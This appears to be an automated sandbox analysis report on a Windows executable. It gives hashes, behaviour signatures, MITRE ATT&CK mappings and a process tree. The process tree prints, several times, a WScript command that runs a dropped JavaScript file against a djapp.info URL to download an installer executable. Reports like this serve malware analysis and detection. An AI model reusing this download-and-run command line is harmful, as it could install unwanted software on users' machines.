Analysis

  • max time kernel
    139s
  • max time network
    102s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2024 15:45

General

  • Target

    63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    63d5af1b22e6e5a6e1a7ae96c60e3243

  • SHA1

    4461bfe2c262f175c622e6e8124899ee16d00eae

  • SHA256

    529d16447d3b5c90f70da4785bc9b046ebe2dcd4310f3cc04a893980de1b5472

  • SHA512

    5c74bd2941d2eb56240e764ec865d1ea3ea667e69f0c1e96b018e1c27738a010dc7d745704ee6415c5923dbc7ebcf9009ecb6039e6959f8df8cea55444ce8aa8

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3B:/7BSH8zUB+nGESaaRvoB7FJNndn4

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6486.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf6486.exe
      2⤵
      • Blocklisted process makes network request
      PID:3284
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6486.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf6486.exe
      2⤵
      • Blocklisted process makes network request
      PID:4568
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6486.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf6486.exe
      2⤵
      • Blocklisted process makes network request
      PID:2452
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6486.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf6486.exe
      2⤵
      • Blocklisted process makes network request
      PID:4544
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6486.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fuf6486.exe
      2⤵
      • Blocklisted process makes network request
      PID:4924

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

JavaScript

1
T1059.007

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fuf6486.js
    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76